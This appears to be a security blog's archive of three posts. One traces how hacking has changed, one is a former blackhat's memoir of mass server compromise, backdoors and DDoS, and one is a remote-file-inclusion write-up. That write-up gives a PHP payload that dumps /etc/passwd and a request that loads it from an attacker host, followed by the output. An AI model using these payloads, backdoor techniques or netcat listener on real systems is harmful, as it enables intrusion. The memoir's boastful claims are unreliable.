Monthly Archives: September 2015

The Evolution of Hacking and Security – From Bindshells to Reverse Shells

So, if you read my previous post on what hacking was like in the mid 90’s to early 2000’s this post will be basically the polar opposite. The hacking game has drastically changed, the old wild wild west version of the internet has turned into cities and suburbs where hacking still takes place but there are now consequences and people are locking their doors. It takes a lot more effort these days to break into a server just like it would into guarded organization. In the old days of hacking 0day exploits would stay 0day for months or even years while a smaller group of hackers rooted most of the internet leaving system administrators ripping their hair out trying to figure out how they got in. Underground sites like rootshell.com and hack.co.za are non-existent.  Hackers discovering 0day vulnerabilities are now required to disclose the information to the vendor before releasing any proof of concept (PoC) code. With security awareness at an all time high this gives attackers very little time to compromise systems before a published CVE is patched on a target system.

Rooting servers at will remotely and slapping up a bindshell has become a thing of the past. Most organizations have multiple DAPE (deny all, permit by exception) firewalls in place. Even if you hack a server in the DMZ and update IPTABLES/IPCHAINS to open port 9999 for instance, there will still be a firewall in front of it preventing incoming connections on that port. You have to compromise uplink routers, switches and firewalls if you want direct access. Security communities are popping up left and right dishing out best practices and implementation procedures to prevent easy access to vital servers.

What bothers me most about hackers today, if I can even call them that as pretty much everything is automated is that hacking is all about money now, stealing peoples credit card information, holding computers for ransom (Ransomware), using bots to perform click fraud, installing fake anti-virus software. We also have the emergence of so called “hacktivist” attacking the left or the right depending on their political views. I hate to call myself a hacker as this generation has embarrassed and degraded the term “hacker.” Hackers were once an elite group of highly skilled free thinking innovators, not thieves and not out to make a quick buck. When we discovered a vulnerability we kept it to ourselves, these days hackers are willing to sell exploit code to the high bidder whomever it may be regardless of the consequences.

I am not trying to sound high and mighty, I have done a lot I am not proud of and maybe accidentally putting many companies out of business with massive sustained DDoS attacks or becoming the world’s #1 Age of Empires player by DoS’n my competition to get a cheap win and maybe I have a few dozen 2600 defacement listings but I never made a dime from any of it. Now I dedicate my life to helping protect the world from people like I was and slowly repaying my debt to society.

I work on the front line now defending against script kiddies and crimeware malware pushers. Remote root exploits are extremely uncommon these days, coders now go through code review checks every step of the way which has made a huge impact on the number of vulnerabilities being found. The term remote root exploit is basically a thing of the past, even if a hackers exploits an FTP server or Apache web server they will land themselves a user account shell instead of a root shell like they would have gotten years ago.

Open WinGates and anonymous proxies are a lot harder to come by these days, instead hackers have turned to The Onion Router (TOR) which makes them close to anonymous when while surfing the web. I say “close to anonymous” because for the most part nobody is looking beyond the TOR IP a user is using and back to the exit node. However, several recent bust were made by the FBI catching child porn rings and credit card schemes where the perpetrators were using TOR but unaware that the exit node was being monitored and logged making an easy bust for the feds.

Instead of hacking remote servers by exploiting vulnerable daemons which used to be the easiest and fastest means of popping a shell and having your way with a server, hackers have turned to hacking web app vulnerabilities. This was an inevitable shift once companies, organizations and even Microsoft Windows started implementing firewalls and blocking all unused and unneeded ports and protocols from the outside world. The most common vulnerabilities now are SQL injection (SQLi) and Cross Site Scripting (XSS). These attacks take time and patience and sometimes even a skilled attacker to know how to tweak a possible finding into actually working.

There are a plethora of tools out there to help automate the SQLi and XSS exploitation such as SQLmap, Havij, NetSparker, BurpSuite, ZAP and even websites such as Shodan which help expose vulnerabilities. A common method of maintaining access to a server once you have broken in is by installing a web shell such as C99 (one of the most popular) or r57. If the attacker is looking to use a compromised host for DoS they may install phpdos.php which is a UDP flooder that does not require root access.

For an attacker to actually get that magical rootshell prompt they typically have to hack user level access first and then exploit a local vulnerability to elevate their privileges to root. Hackers these days don’t even care what operating system they are attacking, they will even go after Windows servers now which would get you laughed at in the old days. *Nix rootshells are a lot more rare these days, the hackers that have them will typically Trojan the SSH daemon and use it as a backdoor into the system as root through an encrypted channel making detection very hard. The common way for a hacker to get CLI access is by installing a reverse shell script or manually running cmd.exe or /bin/sh via some other medium and catching it on the attackers machine with a Netcat listener (nc -v -l 9999).

It is almost ubiquitous now to have an Intrusion Detection System or Intrusion Prevention System running and everyone almost certainly has some type of anti-virus solution. Pure hackers are almost all white hat hackers now making bank working for the man to help secure their enterprise or organization, I know most of my old team has gone legit and profiting greatly from it. We showed the world it was vulnerable to attack from all angles and the world is finally answering with a myriad of security solutions.

Crimeware families are the biggest threat these days, they only care about money so they devote their time developing malware that will earn them revenue in some form. Since it was virtually impossible to break into a Windows machine remotely they figured out another way to get in. Crimeware groups and families developed what are now known as web based exploit kits and around 2010 they started to become prevalent. An exploit kit is essentially software that has a package of preloaded exploits for common web and browser based vulnerabilities such as Java, Flash, Silverlight, Internet Explorer font files and so forth. In order to exploit a victim, the victim needed to browse or land on a page that was hosting an exploit kit. Crimeware actors would use SQLi and stored XSS to insert <iframe> redirects to their malicious landing pages which would attempt to exploit any vulnerable application the host may be running. These campaigns have been extremely successful as many people do not update their version of Flash or Java as they should, when the window pops up saying your Java is out of date do you click update or do you worry about it later? If your one of the I’ll install it later folks you most likely are hosting some type of malware on your system.

The world of Denial of Service has evolved drastically as well, actual Distributed Denial of Service attacks by their most common definition where a hacker uses a group of compromised machines to simultaneously attack a target is far less common these days. Packet kiddies figured out that they were losing far too many shells and bots launching attacks from their own botnets so they started using reflection attacks. In a reflection attack the attacker sends a spoofed request to a server running a service vulnerable to reflection attack (NTP, SSDP, SNMP, CHARGEN, DNS – The most common) and the server responds back to the spoofed IP (the victim of the attack) with more bytes then the attacker sent creating an amplification factor. NTP would be one of the worst offenders with an amplification ratio sometimes as high as 500 to 1. That means an attacker sends one byte of data to the NTP server and the NTP server responds with 500 bytes. An attacker only needs to scan for NTP servers that answer to request for the mon_list command for example and they can be used in a DrDoS attack. These types of attacks have been known to send over 500 gigabytes a second to a victim. That makes them extremely dangerous and extremely hard to catch the attacker who launched it.

What the next evolution of hacking will look like I really don’t know, but I see wireless capability and Bluetooth being installed in everything from refrigerators to cars and homes. With our lives all being stored in the cloud and everything we do revolves around technology these days perhaps Skynet really is in our future.

Share Button

The Evolution of Hacking – From bindshells to reverse shells – Wingates & Proxies instead of TOR

rootshellBasically, if you got into cybersecurity after the year 2003 your perception of hacking is far different than those that were there in the beginning. Lets call the beginning and the initial revolution of hackers staking their claim which began around 1995. Yes, there were many hackers before then but they were few and far between. From 1995 to around 2003 virtually every public facing unix/linux server was compromised. Cyber security was a joke, and the cyber professionals at the time really just did not stand a chance. When I say unix/linux, I mean it all, for instance one of the groups I was “associated with” we’ll say by the year 2001 had rooted 430 SCO servers, 900+ HP-UX, 100+ AIX, 550 DG-UX, 87 Ultrix, 7,000+ IRIX, 8,500+ FreeBSD, BSDi, NetBSD and OpenBSD, 47,000 Solaris/Sun servers and over 65,000 Linux machines including all flavors (Red Hat, Slackware, Debian, Caldera OpenLinux, Trinux, Mandrake, Turbolinux,  SUSE, PuppyLinux, TurboLinux and a myriad of other stragglers. Basically, on 100,000+ rooted machines, sniffers were running on about a third which resulted in every major Cisco core infrastructure router subsequently being compromised.

Literally, the internet was in the hands of this team of hackers. I once witnessed the entire country of Romania be dropped from the internet with an attack of only about 100 enterprise servers over a Romania hacker taking over one of the groups IRC channels that was not heavily protected. Yeah, IRC was a big deal and it was the battle ground for most of these groups. Channels like #shells/#shellz on IRC efnet was one of the main battle ground sites. Whichever group could maintain control over those channels controlled the shell trade. During the late 90’s there were four main groups that were constantly at war, the groups were TNT, Core, Phorce and NoName – TNT would later join Phorce becoming tnt/phorce as they were not strong enough independently to maintain power and control. These groups also controlled the flow of 0day exploits, scanners, backdoors and REAL, ACTUAL rootkits (not this Microsoft brand of “rootkits”). Rootkits were always deployed on *nix machines, as there is not even a root user built into a Windows account so how the term ever became synonymous with Windows Malware is beyond me, it goes to show that the white hat script kiddie ./hax0rs and pen testers have been and will continue to be a joke.

The motivations of these early hackers and packet kiddies was power, respect and knowledge. People often say that it takes a genius to break into NASA or the NSA, my team would hack hundreds of their servers by mistake just owning everything on a /8 not even trying to mess with Government/Military assets, they were never rolled into botnets or rootkitted but instead their fate was that of the ever so famous rm /fr*. Occasionally someone trying to make a name for themselves would slap a psyBNC on one of them and show off on IRC, many of these kiddies would be the ones who would end up in jail or raided because they couldn’t keep their mouths shut and their ego’s always got the best of them. There were a few small groups that loaded up on *.gov *.mil and *.nato infrastructure – from 1995 to 2003 they had infiltrated every accessible node within those organizations undetected. The aggregated data they collected over the years will most likely be never known but NATO was for certain completely compromised during this time period as well as *nas.nasa.gov and the hundreds of *.navy.mil servers running SCO for God knowns what reason. I made sure as to never be a part of any group that harvested Government servers and traffic.

Hacking Windows computers would get you laughed at in the hacker community, in the 90’s Back Orifice, NetBus and Sub7 were very popular and would allow you to have some fun with the victim who had it installed on their PC. Besides the fact that you could open somebody’s CD rom drive 5,000 miles away and redirect them to inappropriate websites and steal all their passwords as well as keylog their actions there was one thing of value on these infected hosts to a hacker, ISP information.

So, how do you root over 100,000 servers around the world without getting caught? Using a scanning tool that was never released to the public, even to this day which puts nmap to shame was called synscan (there are knock offs online, the genuine product lies with only a few individuals) AOL, Erols/RCN, Bell Atlantic and Juno IP space was scanned on ports 31337, 12345 and 27374 and 30 minutes later you had 200 different ISP accounts to hack from, the next step was always locating a target to borrow their phone line to tap into with an RJ-14 and and a tap when they weren’t home to accidentally pick up the phone and hear that ever so glorious dial-up communication and kill the login. Towards the end of my illustrious hacking career WiFi was on the market and a simple drive down the road with Net Stumbler would reveal all the access points I could ever dream of, all without any type of encryption. We would then usually setup a wireless antenna to extend the signal down the street to a rogue access point we configured. To be even more ridiculously careful we’d change our MAC addresses to a NIC made in China. The risk was always still there, not a digital footprint but physically being seen and the cops sneaking up on us.

Once online from a safe distance it was time to play, we needed to access our SPARC super computers to kick off scans and review completed ones. Having an IP touch one of the most powerful super computers in the world that was local to me wasn’t gonna float, even though it couldn’t be directly traced to me at this point. We would use SOCKS proxies that we gathered to initiate a telnet connect to a primary Wingate server that was hosted on the fastest link in the world at the time hut.fi and tut.fi and we would bounce from one gate to another making our source so convoluted that no book educated white hat would ever be able to sort through. Basically it would look like this:

telnet gateserver.nottellinghostname.com 1080

WINGATE->gateserver2.nottellinghostname.com 23

WINGATE->TERM=vs446 hackedfastedserverinworld.com

lightning@server [~]# id

uid=0(root) gid=0(root) groups=0(root)

lightning@server [~]#

 

From this server all of our tools, scanners and scripts were available. Notice that I landed a rootshell upon connecting, that is because any server that ran telnet or ftp I made a specially crafted backdoor that would Trojan /bin/login and /bin/ftp to spawn a rootshell if the right TERM field was passed to it. With an actual rootkit installed on the super computer I was virtually invisible, even if the admin was logged in looking around. A rootkit, a real one that is will Trojan ps, finger, who, netstat, top, lsof, etc and keep my IP out of the logs such as /var/log/messages and wtmp, etc. At this point, if I want to run synscan undetected I simply type ps hide synscan and I am free to run it as I please as it will not show up in top, lsof, etc.

We had three 0day wu-ftpd exploits, a proFTPD 0day exploit, wow.c (cmsd – solaris), bunked.c (rpc.sadmind exploit) 0day telnetd exploits for Linux, Irix, BSD, 0day SSHD exploits for almost every version at the time. From this cluster of super computers every single IP address in the world could be scanned in 24 hours with banner grabber to a log file. The world was ours for the taking with no mitigation procedures in place for any victims as they were not even aware of the vulnerabilities yet. We had root on the three hops on the way to the super computer so there was no issue with being logged. We developed an autorooter that would bind to synscan and automatically exploit vulnerable servers and save them in a text file. Within two days that text file held over 100,000 compromised, backdoored and rootkited servers that only we knew how to access. Since DDoS was a big thing back then amongst peers and who had internet power we would push out mstream and milk.c (0day UDP flooder) and there was not a server in the world that could withstand the bandwidth that could be produced. A system admin who operated infrastructure at a core uplink for one of the main hubs of the internet was so arrogant he offered a $10,000 reward if someone could knock the server offline for even 5 minutes, a few clicks of the mouse and a line of typing and a fraction of the internet went dark until we turned the lights back on. If you were to judge for inflation of bandwidth, the DDoS was equivalent to a 13 terabyte/second attack. Google can load balance and traffic shape all day, it would have been toast.

So, one of the key changes between now and the past is that everything is firewalled, and typically with several firewalls. The remote exploits would still work, but they were crafted with shellcode that would bind a shell to a port. Short of hacking every firewall in line and making ACL changes bindshells have become obsolete. They have been replaced with reverse shells which are the opposite principal, instead of my telneting into your server on port 9999 which is firewalled, the server inside the perimeter initiates a connection to a hostile server that is waiting to catch the shell, typically with netcat using –v –l 9999 etc.

In the 90’s everything was clear text for the most part, telnet and ftp were considered the norm. One huge issue with running telnet with default settings is that the file issue.net will display the operating system, version and kernel version from a simple banner grab. Rootshells were handed on a platter and everyone had them. 0days are only 0day for a matter of hours or days now in most cases as vendors are being notified before PoC is released. In the old days rootshell.com, hack.co.za or packetstorm would have the PoC without consideration for the vendor to patch it. There was no awareness made like there is today, we had 0day exploits for several years before anyone caught on, hence the uncountable number of rootshells a group I knew possessed J I will not be self incriminating here!

Some of the most common exploit vectors were ftpd (especially wu-ftpd and proftpd), telnet (every *nix operating system had a vuln at sometime), imap, pop3, bind/named (dns), and one of the most dangerous ever written was one for rpc.portmapper (one of the leetest ever written – was never released – an upgrade fixed the vulnerability by accident after two years of owning any linux system in the world).

One more thing if you think your safe, if you run sshd and it is not ACL’d you still may be owned right now and never know it, my TERM backdoor was ported to SSH which allows a special login/password combination to drop a rootshell and it won’t be logged on the system.

So why and when did I stop being a blackhat and join the legit side of security?

At 17 I hacked the largest ISP in Canada and gave away more than 50,000 free internet accounts and was ratted out by someone I thought was a friend but just trying to save himself from jail time. I was sued for an observed amount of money, eventually all charges were dropped as they could not produce any evidence I was the hacker who broke in. Around the same time, a friend of mine you may have heard of named mafiaboy decided to DDoS Amazon, CNN, Dell, E*Trade, eBay, and Yahoo! back into the stone age costing $1.2 billion dollars of damage and landing him in jail for a rather short time, if he had done it in today’s world we may never have heard from him again. He wrote a few books once he got out which include a few references to me or at least my aliases. They are good reads into denial of service and a peak into the old days of hacking, here are his two books for virtually nothing:

 


In conclusion, some big take aways from the time period were lack of firewalls, at least multiple ones, PC users almost had virtually no firewalls or host based protections and all services and daemons ran as root! 
IRC Botnets : Kaiten, SDBOT
DoS (All have remained private and never released – you will only find facsimiles online) : stream.c (devastating tcp attack – my favorite), milk.c (best UDP packet flooder ever), slice.c (mixture of IGMP/ICMP flooding)

DoS that was released but very effective (winnuke.exe, teardrop.c, newtear.c, pingflood of death)

DDoS: Stachelnet, Trinoo, Tribal Flood Network (TFN), Mstream (stream.c but not original powerful source code)

DrDoS: Smurf (ICMP) and Fraggle (UDP)

Web Vulnerabilities : phf (you could return the contents of /etc/passwd – this was when it actually contained hashes which John the Ripper could crack), CGI vulnerabilities

Server Vulnerabilities: FTP (wu-ftpd, proftpd – the two biggest problem makers), Telnet (Every *nix OS effected), SSH (every version), CMSD & Sadmind (Solaris), imap/pop3 (Linux mostly), rpc.mountd, rpc.portmapper

Backdoors used: bj.c (my favorite, TERM backdoor for /bin/login), SSH backdoors with hidden embedded root user account, hiding a username within /etc/passwd & /etc/shadow, adding a bindshell on a port by editing /etc/inetd.conf and /etc/services, hiding a suid rootshell in a directory such as /tmp that a normal user account could run to escalate privileges to root.

Simple x86 Intel buffer overflows were as common as a sun set and you could find one in just about any program as code was created and pushed without any vigorous quality checks beyond “Does this work as designed?”.

Windows: lol, no respectable hacker would ever hack a windows machine back then.

 

The last time I hacked anything was the day before my 18th birthday 🙂

Share Button

Exploiting unlinked content using DirBuster, PHP Include() and getting Remote Command Execution (RCE)

This is a real world example – using DirBuster we were able to discover an unlinked file named sugar.php which we enumerated by requesting the  “sugar.php” resource file which returned an error message PHP error: “<b>Error</b>: include(): Filename cannot be empty in”. The valid parameter name “display=” was found using a custom parameter brute forcing script. The display variable passed containing a URL of a remote server to execute arbitrary code running with elevated privileges. This means that the server is now owned, we can now execute arbitrary code as root!

 

Mistake number one should be axiomatic, never run a webserver with system privileges, if your running apache deamon than launch the webserver with that username and restrict the accounts access to the absolute minimum required to operate your webserver. Code execution was possible due to the use of PHP include() statements interpreting PHP code that is passed in the function call. Because user input was passed directly to this function it allowed for arbitrary code execution. There a lot of mistakes this particular admin made. I would advise any of you who are webmasters to check your server’s right now and make sure you don’t have any directories or files you forgot about that could be misused to gain access to your server.

 

Here is what the attack looks like,

 

Here is our proof of concept code – unlinked.php:
<?php echo system(‘uname -a && cat /etc/passwd’);?>

 

Here is our get request to the vulnerable script:

GET /sugar.php?display=http://192.168.1.100:9999/unlinked.php HTTP/1.1
Host: xxxxxxxxxxxxxxxxxxx.org
User-Agent: Mozilla/5.0 (Windows NT 6.4) Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Server Response to query:
HTTP/1.1 200 OK
Date: Mon, 07 Sep 2015 11:36:56 GMT
Server: Apache/2.4.12 PHP/5.5.21 OpenSSL/1.0.1a
X-Powered-By: PHP/5.5.21
Content-Length: 2304
Connection: close
Content-Type: text/html

 

Linux TakemeHome 3.16.0-37-generic #51-Ubuntu SMP Tue May 5 13:45:59 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
syslog:x:100:103::/home/syslog:/bin/false
messagebus:x:101:105::/var/run/dbus:/bin/false
uuidd:x:102:107::/run/uuidd:/bin/false
dnsmasq:x:103:65534:dnsmasq,,,:/var/lib/misc:/bin/false
avahi-autoipd:x:104:114:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
speech-dispatcher:x:105:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
kernoops:x:106:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
rtkit:x:107:115:RealtimeKit,,,:/proc:/bin/false
saned:x:108:116::/home/saned:/bin/false
usbmux:x:109:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
whoopsie:x:110:117::/nonexistent:/bin/false
avahi:x:111:118:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
lightdm:x:112:119:Light Display Manager:/var/lib/lightdm:/bin/false
pulse:x:113:122:PulseAudio daemon,,,:/var/run/pulse:/bin/false
colord:x:114:124:colord colour management daemon,,,:/var/lib/colord:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
ry4wn:x:1000:1000:Ryan Andes,,,:/home/ry4wn:/bin/bash
sshd:x:116:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:117:126:MySQL Server,,,:/nonexistent:/bin/false
proftpd:x:118:65534::/run/proftpd:/bin/false
ftp:x:119:65534::/srv/ftp:/bin/false
snort:x:120:127:Snort IDS:/var/log/snort:/bin/false
tomcat7:x:121:128::/usr/share/tomcat7:/bin/false

Share Button